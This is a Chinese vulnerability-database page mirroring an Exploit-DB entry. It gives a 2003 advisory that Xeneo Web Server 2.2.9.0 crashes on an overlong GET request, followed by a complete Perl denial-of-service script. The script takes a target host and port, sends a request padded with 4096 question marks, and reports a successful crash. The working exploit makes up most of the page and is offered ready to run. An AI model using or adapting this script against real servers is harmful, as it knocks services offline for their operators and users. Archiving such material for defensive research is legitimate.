Xeneo Web Server 2.2.9 – Denial of Service

Xeneo Web Server 2.2.9 – Denial of Service

漏洞ID 1053840 漏洞类型
发布时间 2003-04-21 更新时间 2003-04-21
图片[1]-Xeneo Web Server 2.2.9 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-Xeneo Web Server 2.2.9 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22516
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7398/info

Xeneo web server has been reported prone to denial of service vulnerability.

It has been reported that a specifically crafted HTTP GET request containing over 4096 bytes of data will trigger this vulnerability.

Although absolutely unconfirmed, due to the nature of this vulnerability, memory corruption or arbitrary code execution may also be possible.

It should also be noted, that although this vulnerability has been reported to affect Xeneo web server version 2.2.9.0 previous versions may also be vulnerable. 

##!/usr/bin/perl
#
#
#
#SP Research Labs Advisory x03
#-----------------------------
#www.security-protocols.com
#
#Product - Xeneo Web Server 2.2.9.0
#
#Download it here:
#http://www.northernsolutions.com/index.php?view=product&id=1
#
#Date Released - 04/21/2003
#
#Release Mode - Vendor was notified on 3/18/2003.  Sent a few emails but
#never got any replies.  So here it goes.
#
#----------------------------
#
#Product Description from the vendor -
#
#Xeneo Web Server is designed to deliver high performance and
#reliability. It can be easily extended and customized to host
#everything from a personal web site to advanced web applications
#that use ASP, PHP, ColdFusion, Perl, CGI and ISAPI.  Key Xeneo
#Web Server features include: multiple domain support, integrated
#Windows authentication, scripting interface, enhanced filter
#support, ISAPI, CGI, ASP, SSL, intelligent file caching and more.
#
#-----------------------------
#
#Vulnerability Description -
#
#To exploit this vulnerability, simply do a GET / with 4096 ?'s or  more
#will cause the web server to go down.  It is not exploitable at this
#point.
#
#Tested on:
#
#Windows XP Pro SP1
#Windows 2000 SP3
#
#
# Xeneo Web Server DoS 
#
# Vulnerable systems:
# Xeneo. Web Server 2.2.9.0
# http://www.northernsolutions.com
# 
# Written by badpack3t <[email protected]>
# For SP Research Labs
# 04/21/2003
# 
# www.security-protocols.com
# 
# usage: 
# perl sp-xeneo.pl <target> <port>
#
# big ups 2: c0nnie!!!! 143~!~!~!

use IO::Socket;
use strict;

print ".:."x 20; print "nXeneo Web Server 2.2.9.0 DoS, <[email protected]>n";
print ".:."x 20; print "nn";

if( !defined( $ARGV[ 0 ] && $ARGV[ 1 ]))
{
   &usage;
}

my $host     = $ARGV[ 0 ];
my $def      = "?";
my $num	     = "4096";
my $port     = $ARGV[ 1 ];
my $urfuqed  = $def x $num;

my $tcpval   = getprotobyname( 'tcp' );
my $serverIP = inet_aton( $host );
my $serverAddr = sockaddr_in( $ARGV[ 1 ], $serverIP );
my $protocol_name = "tcp";

my $iaddr    = inet_aton( $host ) 	       || die ( "host was not found: $host" );
my $paddr    = sockaddr_in( $port, $iaddr )    || die ( "you did something wrong stupid... exiting..." );
my $proto    = getprotobyname( 'tcp' )         || die ( "cannot get protocol" );
socket( SOCK, PF_INET, SOCK_STREAM, $proto )   || die ( "socket could not open: $host" );
connect( SOCK, $paddr ) 		       || die ( "cannot connect to: $host" );

my $submit   = "GET /$urfuqed HTTP/1.0rnrn";   
send( SOCK,$submit,0 );
close( SOCK );

sub usage 
{
   die( "nnUsage: perl $0 <target_host> <port>nn" );
}

print "n.:.:.:.:.:.:.:.:.:.:.:.";
print "ncrash was successful ~!n";
print ".:.:.:.:.:.:.:.:.:.:.:.n";

相关推荐: HP-UX VJE.VJE-RUN Default Path Modification Vulnerability

HP-UX VJE.VJE-RUN Default Path Modification Vulnerability 漏洞ID 1101582 漏洞类型 Environment Error 发布时间 2002-08-28 更新时间 2002-08-28 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享